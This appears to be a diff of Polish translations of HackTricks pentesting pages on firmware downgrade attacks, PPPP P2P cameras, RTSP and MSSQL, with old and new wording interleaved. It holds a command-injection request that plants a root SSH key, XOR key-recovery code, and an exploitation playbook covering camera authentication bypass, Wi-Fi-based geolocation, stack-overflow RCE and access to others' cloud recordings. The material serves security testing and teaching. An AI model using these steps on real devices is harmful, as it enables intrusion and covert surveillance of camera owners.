Systemy operacyjne takie jak [AttifyOS](https://github.com/adi0x90/attifyos) i [EmbedOS](https://github.com/scriptingxss/EmbedOS) zapewniają wstępnie skonfigurowane środowiska do testowania bezpieczeństwa firmware'u, wyposażone w niezbędne narzędzia.
Systemy takie jak [AttifyOS](https://github.com/adi0x90/attifyos) i [EmbedOS](https://github.com/scriptingxss/EmbedOS) dostarczają prekonfigurowane środowiska do testów security firmware, wyposażone w niezbędne narzędzia.
## Przygotowane systemy operacyjne do analizy firmware'u
## Gotowe OS-y do analizy Firmware
- [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS to dystrybucja mająca na celu pomoc w przeprowadzaniu oceny bezpieczeństwa i testów penetracyjnych urządzeń Internetu Rzeczy (IoT). Oszczędza dużo czasu, oferując wstępnie skonfigurowane środowisko z wszystkimi niezbędnymi narzędziami.
- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): System operacyjny do testowania bezpieczeństwa wbudowanego, oparty na Ubuntu 18.04, wstępnie załadowany narzędziami do testowania bezpieczeństwa firmware'u.
- [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS to dystrybucja mająca pomóc w przeprowadzaniu security assessment i penetration testing urządzeń Internet of Things (IoT). Oszczędza czas, dostarczając prekonfigurowane środowisko z załadowanymi niezbędnymi narzędziami.
- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system oparty na Ubuntu 18.04, wstępnie załadowany narzędziami do testów security firmware.
## Ataki na obniżenie wersji firmware'u i niebezpieczne mechanizmy aktualizacji
## Ataki downgrade firmware i niezabezpieczone mechanizmy aktualizacji
Nawet gdy dostawca wdraża kontrole podpisu kryptograficznego dla obrazów firmware'u, **ochrona przed cofaniem wersji (downgrade) jest często pomijana**. Gdy bootloader lub loader odzyskiwania tylko weryfikuje podpis za pomocą osadzonego klucza publicznego, ale nie porównuje *wersji* (lub monotonicznego licznika) obrazu, który jest wgrywany, atakujący może legalnie zainstalować **starszy, podatny firmware, który nadal ma ważny podpis** i w ten sposób ponownie wprowadzić załatane luki.
Nawet gdy vendor implementuje sprawdzanie podpisów kryptograficznych dla obrazów firmware, **ochrona przed version rollback (downgrade) jest często pomijana**. Gdy boot- lub recovery-loader tylko weryfikuje podpis przy użyciu wbudowanego klucza publicznego, ale nie porównuje *wersji* (lub monotonicznego licznika) obrazu będącego flashowanym, atakujący może legalnie zainstalować **starsze, podatne firmware, które nadal ma ważny podpis**, i w ten sposób ponownie wprowadzić załatane wcześniej podatności.
Typowy przebieg ataku:
1. **Uzyskaj starszy podpisany obraz**
* Pobierz go z publicznego portalu pobierania dostawcy, CDN lub strony wsparcia.
* Wyodrębnij go z towarzyszących aplikacji mobilnych/desktopowych (np. wewnątrz Android APK w `assets/firmware/`).
* Pobierz go z repozytoriów stron trzecich, takich jak VirusTotal, archiwa internetowe, fora itp.
2. **Prześlij lub udostępnij obraz urządzeniu** przez dowolny wystawiony kanał aktualizacji:
* Interfejs webowy, API aplikacji mobilnej, USB, TFTP, MQTT itp.
* Wiele konsumenckich urządzeń IoT wystawia *nieautoryzowane* punkty końcowe HTTP(S), które akceptują blob'y firmware'u zakodowane w Base64, dekodują je po stronie serwera i uruchamiają odzyskiwanie/aktualizację.
3. Po obniżeniu wersji wykorzystaj lukę, która została załatana w nowszej wersji (na przykład filtr wstrzykiwania poleceń, który został dodany później).
4. Opcjonalnie wgraj najnowszy obraz z powrotem lub wyłącz aktualizacje, aby uniknąć wykrycia po uzyskaniu trwałości.
1. **Obtain an older signed image**
* Pobierz go z publicznego portalu download vendora, CDN lub strony wsparcia.
* Wydobądź go z aplikacji towarzyszących mobilnych/desktop (np. wewnątrz Android APK pod `assets/firmware/`).
* Uzyskaj go z repozytoriów third-party, takich jak VirusTotal, archiwa internetowe, fora itp.
2. **Upload or serve the image to the device** via any exposed update channel:
* Web UI, mobile-app API, USB, TFTP, MQTT itp.
* Wiele konsumenckich urządzeń IoT udostępnia *unauthenticated* HTTP(S) endpoints, które przyjmują Base64-encoded firmware blobs, dekodują je po stronie serwera i wywołują recovery/upgrade.
3. Po downgrade, exploituj podatność, która została załatana w nowszym release (na przykład filter command-injection dodany później).
4. Opcjonalnie wgraj najnowszy obraz z powrotem lub wyłącz updates, aby uniknąć wykrycia po uzyskaniu persistence.
### Przykład: Wstrzykiwanie poleceń po obniżeniu wersji
### Przykład: Command Injection po downgrade
```http
POST /check_image_and_trigger_recovery?md5=1; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC...' >> /root/.ssh/authorized_keys HTTP/1.1
Host: 192.168.0.1
Content-Type: application/octet-stream
Content-Length: 0
```
W podatnym (downgradowanym) firmware, parametr `md5` jest bezpośrednio łączony z poleceniem powłoki bez sanitizacji, co pozwala na wstrzykiwanie dowolnych poleceń (tutaj włączenie dostępu root opartego na kluczu SSH). Późniejsze wersje firmware wprowadziły podstawowy filtr znaków, ale brak ochrony przed downgrade'em czyni tę poprawkę bezprzedmiotową.
W podatnym (przywróconym do starszej wersji) firmware parametr `md5` jest konkatenowany bezpośrednio do polecenia shell bez sanitizacji, co pozwala na wstrzyknięcie dowolnych poleceń (tutaj — umożliwienie dostępu root opartego na kluczach SSH). Późniejsze wersje firmware wprowadziły podstawowy filtr znaków, ale brak ochrony przed downgrade unieważnia tę poprawkę.
### Ekstrakcja firmware z aplikacji mobilnych
### Wyodrębnianie firmware z aplikacji mobilnych
Wielu dostawców pakuje pełne obrazy firmware w swoich towarzyszących aplikacjach mobilnych, aby aplikacja mogła zaktualizować urządzenie przez Bluetooth/Wi-Fi. Te pakiety są zazwyczaj przechowywane w postaci niezaszyfrowanej w APK/APEX pod ścieżkami takimi jak `assets/fw/` lub `res/raw/`. Narzędzia takie jak `apktool`, `ghidra` lub nawet zwykły `unzip` pozwalają na pobranie podpisanych obrazów bez dotykania fizycznego sprzętu.
Wielu dostawców pakuje pełne obrazy firmware wewnątrz ich aplikacji mobilnych towarzyszących urządzeniu, aby aplikacja mogła aktualizować urządzenie przez Bluetooth/WiFi. Te pakiety są zwykle przechowywane niezaszyfrowane w APK/APEX pod ścieżkami takimi jak `assets/fw/` lub `res/raw/`. Narzędzia takie jak `apktool`, `ghidra` lub nawet zwykły `unzip` pozwalają pobrać podpisane obrazy bez dotykania fizycznego sprzętu.
```
$ apktool d vendor-app.apk -o vendor-app
$ ls vendor-app/assets/firmware
@ -252,21 +259,21 @@ firmware_v1.3.11.490_signed.bin
```
### Lista kontrolna oceny logiki aktualizacji
* Czy transport/autoryzacja *punktu aktualizacji* jest odpowiednio chroniona (TLS + autoryzacja)?
* Czy urządzenie porównuje **numery wersji** lub **monotoniczny licznik przeciwdziałania cofaniu** przed wgraniem?
* Czy obraz jest weryfikowany w ramach bezpiecznego łańcucha rozruchowego (np. podpisy sprawdzane przez kod ROM)?
* Czy kod w przestrzeni użytkownika wykonuje dodatkowe kontrole poprawności (np. dozwolona mapa partycji, numer modelu)?
* Czy *częściowe* lub *kopie zapasowe* przepływy aktualizacji ponownie wykorzystują tę samą logikę walidacji?
* Czy transport/autentykacja *update endpoint* jest odpowiednio zabezpieczona (TLS + authentication)?
* Czy urządzenie porównuje **version numbers** lub **monotonic anti-rollback counter** przed flashowaniem?
* Czy obraz jest weryfikowany w ramach secure boot chain (e.g. signatures checked by ROM code)?
* Czy userland code wykonuje dodatkowe sanity checks (e.g. allowed partition map, model number)?
* Czy *partial* lub *backup* update flows ponownie używają tej samej logiki walidacji?
> 💡 Jeśli któregokolwiek z powyższych brakuje, platforma prawdopodobnie jest podatna na ataki cofania.
> 💡 Jeśli którykolwiek z powyższych elementów brakuje, platforma prawdopodobnie jest podatna na rollback attacks.
## Podatne oprogramowanie układowe do ćwiczeń
## Vulnerable firmware to practice
Aby ćwiczyć odkrywanie luk w oprogramowaniu układowym, użyj następujących podatnych projektów oprogramowania układowego jako punktu wyjścia.
Aby poćwiczyć odkrywanie podatności w firmware, jako punkt wyjścia użyj następujących projektów vulnerable firmware.
- OWASP IoTGoat
- [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
- Projekt Damn Vulnerable Router Firmware
- The Damn Vulnerable Router Firmware Project
- [https://github.com/praetorian-code/DVRF](https://github.com/praetorian-code/DVRF)
- Damn Vulnerable ARM Router (DVAR)
- [https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html)
@ -277,13 +284,13 @@ Aby ćwiczyć odkrywanie luk w oprogramowaniu układowym, użyj następujących
- Damn Vulnerable IoT Device (DVID)
- [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
## Odniesienia
## Referencje
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
- [Exploiting zero days in abandoned hardware Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/)
## Szkolenie i certyfikacja
## Szkolenia i certyfikaty
- [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)

BIN
src/images/k8studio.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.5 KiB

165
src/network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md Normal file
View File

@ -0,0 +1,165 @@
# 32100/UDP - Pentesting PPPP (CS2) P2P Kamery
{{#include ../banners/hacktricks-training.md}}
## Przegląd
PPPP (a.k.a. “P2P”) to proprietarny stos łączności urządzeń od CS2 Network, szeroko osadzony w tanich kamerach IP i innych urządzeniach IoT. Zapewnia rendezvous, NAT traversal (UDP hole punching), warstwowy „reliable” stream na bazie UDP oraz schemat adresowania oparty na ID, pozwalając aplikacji mobilnej/desktopowej dotrzeć do urządzeń w dowolnym miejscu w Internecie znając tylko ich ID.
Kluczowe cechy istotne dla atakujących:
- Urządzenia rejestrują się do trzech serwerów rendezvous zarządzanych przez producenta dla każdego prefiksu ID. Klienci pytają te same serwery o zewnętrzny/relay adres urządzenia, po czym próbują UDP hole punching. Istnieje fallback na relay.
- Domyślny listener serwera jest dostępny przez UDP/32100. Minimalny probe „hello” wystarcza do zfingerprintingowania serwerów i niektórych urządzeń.
- Opcjonalny blanket cipher oraz specjalny tryb „CRCEnc” istnieją, ale są słabe z założenia i zazwyczaj wyłączone w popularnych ekosystemach (np. LookCam).
- Control plane to zwykle JSONowe komendy przesyłane przez PPPP stream i często cierpi na brak autoryzacji oraz błędy związane z bezpieczeństwem pamięci.
Typowy format ID urządzenia (rodzina LookCam): PREFIX-######-CCCCC, skracany w aplikacjach (np. GHBB-000001-NRLXW → G000001NRLXW). Zaobserwowane prefiksy: BHCC ("hekai"), FHBB i GHBB ("mykj").
## Odkrywanie i enumeracja
- Ekspozycja w Internecie: wiele super-nodów PPPP odpowiada na probe UDP/32100. Odpowiedzi z znanym plaintextem i error-stringami ułatwiają ich identyfikację w przechwyconym ruchu i przy użyciu skanerów Internetowych.
- Odkrywanie w LAN: urządzenia często odpowiadają na niezaszyfrowane zapytanie wysłane na broadcast lokalny. Użyj skryptu Paula Marrapese do enumeracji:
- [https://github.com/pmarrapese/iot/tree/master/p2p/lansearch](https://github.com/pmarrapese/iot/tree/master/p2p/lansearch)
Uwagi:
- Aplikacje zawierają „init strings”, które zawierają obfuskowane listy IP serwerów i klucze protokołu. Te stringi są trywialnie wydobywalne z klientów Android/iOS/Windows i często współdzielone pomiędzy wieloma liniami produktowymi.
## NAT Traversal i transport
- Serwery rendezvous uczą się publicznego mapowania urządzenia dzięki okresowym keepalive wysyłanym przez urządzenie. Klienci pytają serwery o mapowanie, a następnie próbują bezpośrednich połączeń UDP używając hole punching. Jeśli NAT traversal zawiedzie, ruch jest relayowany przez wyznaczone hosty PPPP relay.
- Aplikacyjny „stream” implementuje własną logikę ACK/retx na bazie UDP; pętle retransmisji są powielone w wielu ścieżkach kodu i mogą zalać łącza o wysokiej utracie pakietów.
## Słabe „szyfrowanie” i odzyskiwanie klucza
W staku CS2 istnieją dwa nieskuteczne mechanizmy:
1) Blanket cipher (opcjonalny) P2P_Proprietary_Encrypt
- Zazwyczaj wyłączany przez OEMy używające LookCam.
- Po stronie aplikacji „init string” dostarcza materiał kluczowy, redukowany do efektywnego 4-bajtowego klucza (~2^32 przestrzeni).
- Praktyczny known-plaintext: pierwsze 4 bajty MSG_HELLO do UDP/32100 są znane i wynoszą F1 00 00 00. Zaobserwowanie pojedynczego zaszyfrowanego handshake pozwala na szybkie odzyskanie klucza lub jego walidację.
- Niektóre komunikaty kontrolne (np. MSG_REPORT_SESSION_READY) są zawsze szyfrowane twardo zakodowanym w bibliotece kluczem współdzielonym między aplikacjami.
2) Rejestracyjne „szyfrowanie” PPPP_CRCEnc
- Pomimo nazwy, to nie jest CRC. To stały powtarzający się keystream XOR z 4-bajtową kontrolą paddingu (bez uwierzytelnienia).
- Sieci LookCam zwykle używają CRCEnc tylko do rejestracji urządzenie → serwer (MSG_DEV_LGN_CRC). Większość pozostałego ruchu pozostaje w plaintext.
Proste odzyskiwanie keystream dla PPPP_CRCEnc (Python):
```python
# ciphertext: captured bytes of an encrypted registration message
# known: guessed/known plaintext region (e.g., JSON or constant header)
keystream = bytes([c ^ p for c, p in zip(ciphertext[:len(known)], known)])
# Decrypt more bytes by XORing with the repeating keystream
pt = bytes([c ^ keystream[i % len(keystream)] for i, c in enumerate(ciphertext)])
```
Niedopasowanie modelu zagrożeń: materiały CS2 skupiają się na zapobieganiu DoS poprzez fałszywe rejestracje urządzeń, a nie na poufności. To wyjaśnia selektywną „encryption” rejestracji, podczas gdy video/control pozostają opcjonalne lub w postaci cleartext. Historyczne serwery PPPP nie mają ograniczeń szybkości, umożliwiając brute-force/abuse na dużą skalę.
## Płaszczyzna kontrolna: JSON Commands and Auth Bypass
Wiele firmware kamer PPPP wymienia wiadomości JSON po nawiązaniu sesji. Przykładowe „login”, które wysyła klient:
```json
{
"cmd": "LoginDev",
"pwd": "123456"
}
```
Powszechna podatność w urządzeniach klasy LookCam:
- Firmware ignoruje zarówno flow LoginDev, jak i pola pwd w żądaniach (CWE-287, CWE-306). Urządzenie akceptuje polecenia operacyjne bez weryfikacji hasła.
- Eksploatacja: nie wysyłaj LoginDev lub zignoruj jego wynik; wysyłaj polecenia bezpośrednio.
Przydatne polecenia zaobserwowane:
- searchWiFiList wywołuje iwlist; zapisuje surowe wyjście w /tmp/wifi_scan.txt.
- DownloadFile prymityw odczytu dowolnej ścieżki (bez ograniczeń dotyczących ścieżki).
Procedura deanonimizacji lokalizacji za pomocą przemijających artefaktów:
1) Wyślij {"cmd":"searchWiFiList"}.
2) Odczytaj /tmp/wifi_scan.txt za pomocą DownloadFile.
3) Prześlij BSSID MACi do geolocation API (np. Google Geolocation API), aby zlokalizować kamerę z dokładnością do kilkudziesięciu metrów.
## Od błędów bezpieczeństwa pamięci do RCE na firmware wbudowanym
Typowy niebezpieczny wzorzec (pseudokod z handlerów):
```c
char buf[256];
char *cmd = cJSON_GetObjectItem(request, "cmd")->valuestring;
memset(buf, 0, sizeof(buf));
memcpy(buf, cmd, strlen(cmd)); // no bound check
```
- Wyzwalacz: dowolny ciąg cmd > 255 bajtów powoduje stack buffer overflow (CWE-120/121).
- Ochrona: brak stack canary; DEP/NX i ASLR zazwyczaj wyłączone w tych buildach.
- Skutek: prosty jednopoziomowy shellcode lub klasyczny ROP/ret2libc na CPU urządzenia (np. ARM) pozwalający na pełne przejęcie i pivotowanie w LAN.
See also:
-
{{#ref}}
../binary-exploitation/stack-overflow/README.md
{{#endref}}
-
{{#ref}}
../binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
{{#endref}}
## Cloud Storage Abuse (HTTP, Device-ID only)
Wiele firmwareów marki LookCam wysyła nagrania na api.l040z.com (apicn.l040z.com dla BHCC) wyłącznie przez HTTP. Obserwacje:
- Brak TLS w firmware; transport jest jawny HTTP.
- „Uwierzytelnianie” API to tylko device-ID: każdy znający ID może pobrać nagrania.
- Dzielenie na chunky po 5 MiB jest zakodowane na stałe.
- Zdalne włączenie: przy starcie urządzenie wywołuje http://api.l040z.com/camera/signurl; odpowiedź serwera decyduje, czy uploady się rozpoczną. Aplikacja mobilna może pokazywać chmurę jako „disabled” nawet gdy uploady zachodzą. Strona trzecia może zakupić/włączyć chmurę dla czyjegoś ID i po cichu zbierać materiał.
To klasyczne przesyłanie w postaci jawnego tekstu zawierające dane wrażliwe (CWE-319) z brakującą autoryzacją po stronie serwera (authZ).
## Device-ID Enumeration and Guessing
- Format ID: PREFIX-######-CCCCC oraz skrócona forma używana przez aplikację (np. GHBB-000001-NRLXW → G000001NRLXW).
- Rodziny prefiksów: BHCC (hekai servers), FHBB i GHBB (mykj servers). Każdy prefiks mapuje na trzy rendezvous servers dla HA.
- Weryfikator 5-literowy używa alfabetu 22 wielkich liter (A, I, O, Q wyłączone) → 22^5 ≈ 5.15M kombinacji na bazę numeryczną.
- Wcześniejsze analizy nie wykazały limitowania zapytań po stronie serwera, co czyni rozproszone zgadywanie praktycznym. Algorytm weryfikatora jest niestandardowy i prawdopodobnie da się go odgadnąć lub uzyskać przez reversing aplikacji/firmware.
Praktyczne źródła ID:
- Wyświetlane w całej oficjalnej aplikacji i często leaked w zrzutach ekranu/filmach użytkowników.
- SSID trybu AP równa się device ID; wiele urządzeń udostępnia otwarte AP podczas onboardingu.
## Forcing Remote Reachability
Niektóre firmwarey restartują się w pętli, dopóki rendezvous servers nie będą osiągalne. Jeśli egress jest zablokowany, urządzenie pozostanie w cyklu rebootu, skutecznie zmuszając właścicieli do pozostawienia go z dostępem do Internetu i wystawieniem na PPPP rendezvous.
## Practical Exploitation Playbook (for repro/defense testing)
1) Obtain device ID
- Z UI aplikacji lub SSID AP; w przeciwnym razie enumeruj PREFIX+numer i bruteforceuj przestrzeń weryfikatora 22^5.
2) Establish PPPP session
- Użyj CS2 PPPP clienta lub własnego kodu; wyciągnij listy IP serwerów i init keys z app init string; spróbuj UDP hole punching; w ostateczności użyj relay.
3) Bypass auth
- Pomiń LoginDev lub zignoruj jego wynik; wyślij bezpośrednio operational JSON.
4) Exfiltrate files / geo-locate
- Wyślij {"cmd":"searchWiFiList"}; następnie DownloadFile "/tmp/wifi_scan.txt"; przekaż BSSIDs do geolocation API.
5) Achieve RCE
- Wyślij cmd > 255 bajtów aby wywołać stack overflow; zbuduj ROP/ret2libc lub wrzuć shellcode (brak canary/DEP/ASLR).
6) Cloud access
- Interaguj z endpointami api.l040z.com używając tylko device ID; uwaga na 5 MiB chunking; włączenie chmury kontrolowane przez /camera/signurl niezależnie od stanu UI aplikacji.
## Related Protocols/Services
-
{{#ref}}
554-8554-pentesting-rtsp.md
{{#endref}}
-
{{#ref}}
../generic-methodologies-and-resources/pentesting-wifi/README.md
{{#endref}}
## References
- [A look at a P2P camera (LookCam app) Almost Secure](https://palant.info/2025/09/08/a-look-at-a-p2p-camera-lookcam-app/)
- [PPPP device discovery on LAN (Paul Marrapese)](https://github.com/pmarrapese/iot/tree/master/p2p/lansearch)
- [LookCam analysis (Warwick University, 2023)](https://www.dcs.warwick.ac.uk/~fenghao/files/hidden_camera.pdf)
- [General PPPP analysis Elastic Security Labs (2024)](https://www.elastic.co/security-labs/storm-on-the-horizon)
- [CS2 Network sales deck (2016) PPPP/threat model](https://prezi.com/5cztk-98izyc/cs2-network-p2p/)
- [Anyka hardened community firmware](https://github.com/Nemobi/Anyka/)
{{#include ../banners/hacktricks-training.md}}

46
src/network-services-pentesting/554-8554-pentesting-rtsp.md
View File

@ -6,9 +6,9 @@
Z [wikipedia](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol):
> **Real Time Streaming Protocol** (**RTSP**) to protokół kontroli sieci zaprojektowany do użycia w systemach rozrywkowych i komunikacyjnych w celu kontrolowania serwerów mediów strumieniowych. Protokół jest używany do ustanawiania i kontrolowania sesji mediów między punktami końcowymi. Klienci serwerów mediów wydają polecenia w stylu VHS, takie jak odtwarzanie, nagrywanie i pauza, aby ułatwić kontrolę w czasie rzeczywistym nad strumieniowaniem mediów z serwera do klienta (Video On Demand) lub z klienta do serwera (Voice Recording).
> The **Real Time Streaming Protocol** (**RTSP**) to protokół sterowania siecią zaprojektowany do użycia w systemach rozrywkowych i komunikacyjnych w celu kontroli serwerów strumieniowania mediów. Protokół jest używany do ustanawiania i kontrolowania sesji medialnych między punktami końcowymi. Klienci serwerów mediów wydają polecenia w stylu VHS, takie jak play, record i pause, aby ułatwić sterowanie w czasie rzeczywistym strumieniowaniem mediów z serwera do klienta (Video On Demand) lub od klienta do serwera (Voice Recording).
>
> Transmisja danych strumieniowych nie jest zadaniem RTSP. Większość serwerów RTSP używa protokołu Real-time Transport Protocol (RTP) w połączeniu z Real-time Control Protocol (RTCP) do dostarczania strumieni mediów. Jednak niektórzy dostawcy wdrażają własne protokoły transportowe. Oprogramowanie serwera RTSP od RealNetworks, na przykład, również używa własnego protokołu Real Data Transport (RDT).
> Przesyłanie samych danych strumieniowych nie jest zadaniem RTSP. Większość serwerów RTSP używa Real-time Transport Protocol (RTP) w połączeniu z Real-time Control Protocol (RTCP) do dostarczania strumieni mediów. Jednak niektórzy dostawcy implementują własne protokoły transportowe. Oprogramowanie serwera RTSP od RealNetworks, na przykład, również używało proprietarnego Real Data Transport (RDT) firmy RealNetworks.
**Domyślne porty:** 554,8554
```
@ -17,21 +17,21 @@ PORT STATE SERVICE
```
## Kluczowe szczegóły
**RTSP** jest podobny do HTTP, ale zaprojektowany specjalnie do strumieniowania mediów. Jest zdefiniowany w prostych specyfikacjach, które można znaleźć tutaj:
**RTSP** jest podobny do HTTP, ale zaprojektowany specjalnie do strumieniowania multimediów. Jest zdefiniowany w prostej specyfikacji, którą można znaleźć tutaj:
[RTSP RFC2326](https://tools.ietf.org/html/rfc2326)
Urządzenia mogą umożliwiać **nieautoryzowany** lub **autoryzowany** dostęp. Aby to sprawdzić, wysyłane jest żądanie "DESCRIBE". Podstawowy przykład przedstawiono poniżej:
Urządzenia mogą umożliwiać dostęp **bez uwierzytelniania** lub **z uwierzytelnianiem**. Aby to sprawdzić, wysyła się żądanie "DESCRIBE". Poniżej pokazano podstawowy przykład:
`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2`
Pamiętaj, że poprawne formatowanie obejmuje podwójne "\r\n" dla spójnej odpowiedzi. Odpowiedź "200 OK" wskazuje na **nieautoryzowany dostęp**, podczas gdy "401 Unauthorized" sygnalizuje potrzebę autoryzacji, ujawniając, czy wymagana jest **autoryzacja Basic** czy **Digest**.
Pamiętaj, prawidłowe formatowanie zawiera podwójne "\r\n" dla spójnej odpowiedzi. Odpowiedź "200 OK" wskazuje na **dostęp bez uwierzytelniania**, natomiast "401 Unauthorized" sygnalizuje konieczność uwierzytelnienia, ujawniając, czy wymagane jest **Basic** or **Digest authentication**.
Dla **autoryzacji Basic** kodujesz nazwę użytkownika i hasło w base64 i dołączasz je do żądania w ten sposób:
Dla **Basic authentication** kodujesz nazwę użytkownika i hasło w base64 i umieszczasz je w żądaniu w ten sposób:
`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==`
Ten przykład używa "admin" i "1234" jako poświadczeń. Oto **skrypt Python** do wysłania takiego żądania:
W tym przykładzie użyto "admin" i "1234" jako poświadczeń. Oto **Python script** do wysłania takiego żądania:
```python
import socket
req = "DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n"
@ -41,18 +41,18 @@ s.sendall(req)
data = s.recv(1024)
print(data)
```
**Podstawowa autoryzacja** jest prostsza i preferowana. **Autoryzacja z użyciem skrótu** wymaga starannego zarządzania szczegółami autoryzacji podanymi w odpowiedzi "401 Unauthorized".
**Basic authentication** jest prostsze i zalecane. **Digest authentication** wymaga ostrożnego obchodzenia się z danymi uwierzytelniającymi podanymi w odpowiedzi "401 Unauthorized".
Ten przegląd upraszcza proces uzyskiwania dostępu do strumieni RTSP, koncentrując się na **Podstawowej autoryzacji** ze względu na jej prostotę i praktyczność w początkowych próbach.
Niniejszy przegląd upraszcza proces dostępu do strumieni RTSP, koncentrując się na **Basic authentication** ze względu na jego prostotę i praktyczność przy pierwszych próbach.
## Enumeracja
Zdobądźmy informacje o obsługiwanych metodach i adresach URL oraz spróbujmy przeprowadzić atak brute-force (jeśli to konieczne), aby uzyskać dostęp do treści.
Zbierzmy informacje o obsługiwanych metodach i URLs oraz, w razie potrzeby, spróbujmy brute-force uzyskać dostęp do zawartości.
```bash
nmap -sV --script "rtsp-*" -p <PORT> <IP>
```
#### Oglądanie strumienia RTSP za pomocą [ffplay](https://ffmpeg.org/ffplay.html)
Gdy odkryjesz ważną ścieżkę RTSP (np. `/mpeg4`, `/live.sdp`) i potwierdzisz dostęp (bez uwierzytelnienia lub z danymi logowania), możesz użyć `ffplay`, aby przesyłać strumień:
Gdy odkryjesz prawidłową ścieżkę RTSP (np. `/mpeg4`, `/live.sdp`) i potwierdzisz dostęp (bez uwierzytelnienia lub z credentials), możesz użyć `ffplay`, aby odtworzyć strumień:
```bash
ffplay -rtsp_transport tcp rtsp://<IP>/mpeg4 -x 2560 -y 1440
```
@ -64,19 +64,25 @@ ffplay -rtsp_transport tcp rtsp://<IP>/mpeg4 -x 2560 -y 1440
### **Inne przydatne programy**
Aby przeprowadzić brute force: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https://github.com/Tek-Security-Group/rtsp_authgrinder)
To bruteforce: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https://github.com/Tek-Security-Group/rtsp_authgrinder)
[**Cameradar**](https://github.com/Ullaakut/cameradar)
- Wykryj otwarte hosty RTSP na dowolnym dostępnym celu
- Uzyskaj ich publiczne informacje (nazwa hosta, port, model kamery itp.)
- Uruchom zautomatyzowane ataki słownikowe, aby uzyskać ich trasę strumienia (na przykład /live.sdp)
- Uruchom zautomatyzowane ataki słownikowe, aby uzyskać nazwę użytkownika i hasło kamer
- Generuj miniatury z nich, aby sprawdzić, czy strumienie są ważne i mieć szybki podgląd ich zawartości
- Spróbuj stworzyć potok Gstreamer, aby sprawdzić, czy są poprawnie zakodowane
- Wydrukuj podsumowanie wszystkich informacji, które Cameradar mógł uzyskać
- Wykrywa otwarte hosty RTSP na każdym dostępnym celu
- Pobiera ich publiczne informacje (nazwę hosta, port, model kamery itp.)
- Uruchamia automatyczne ataki słownikowe, aby uzyskać ścieżkę strumienia (np. /live.sdp)
- Uruchamia automatyczne ataki słownikowe, aby zdobyć nazwę użytkownika i hasło kamer
- Generuje miniaturki, aby sprawdzić, czy strumienie są poprawne i uzyskać szybki podgląd ich zawartości
- Próbuje utworzyć pipeline Gstreamer, aby sprawdzić, czy są poprawnie zakodowane
- Wypisuje podsumowanie wszystkich informacji, które Cameradar mógł uzyskać
## References
### Zobacz także
{{#ref}}
32100-udp-pentesting-pppp-cs2-p2p-cameras.md
{{#endref}}
## Referencje
- [https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol)
- [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)

190
src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
View File

@ -4,35 +4,35 @@
## Podstawowe informacje
Z [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
Źródło: [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server):
> **Microsoft SQL Server** to system zarządzania **relacyjną bazą danych** opracowany przez Microsoft. Jako serwer baz danych jest produktem oprogramowania, którego główną funkcją jest przechowywanie i pobieranie danych na żądanie innych aplikacji oprogramowania — które mogą działać na tym samym komputerze lub na innym komputerze w sieci (w tym w Internecie).
> **Microsoft SQL Server** jest **relacyjnym systemem zarządzania bazą danych** opracowanym przez Microsoft. Jako serwer baz danych jest produktem programowym o podstawowej funkcji przechowywania i pobierania danych na żądanie innych aplikacji programowych — które mogą działać na tym samym komputerze lub na innym komputerze w sieci (włącznie z Internetem).
**Domyślny port:** 1433
```
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
```
### **Domyślne tabele systemowe MS-SQL**
### **Default MS-SQL System Tables**
- **master Database**: Ta baza danych jest kluczowa, ponieważ rejestruje wszystkie szczegóły na poziomie systemu dla instancji SQL Server.
- **msdb Database**: SQL Server Agent wykorzystuje tę bazę danych do zarządzania harmonogramem dla alertów i zadań.
- **model Database**: Działa jako szablon dla każdej nowej bazy danych na instancji SQL Server, gdzie wszelkie zmiany, takie jak rozmiar, porządek sortowania, model odzyskiwania i inne, są odzwierciedlane w nowo utworzonych bazach danych.
- **Resource Database**: Baza danych tylko do odczytu, która zawiera obiekty systemowe dostarczane z SQL Server. Obiekty te, chociaż fizycznie przechowywane w bazie danych Resource, są logicznie prezentowane w schemacie sys każdej bazy danych.
- **tempdb Database**: Służy jako tymczasowy obszar przechowywania dla obiektów przejściowych lub pośrednich zestawów wyników.
- **master Database**: Ta baza danych jest kluczowa, ponieważ zawiera wszystkie informacje na poziomie systemowym dla instancji SQL Server.
- **msdb Database**: SQL Server Agent wykorzystuje tę bazę danych do zarządzania harmonogramem alertów i zadań.
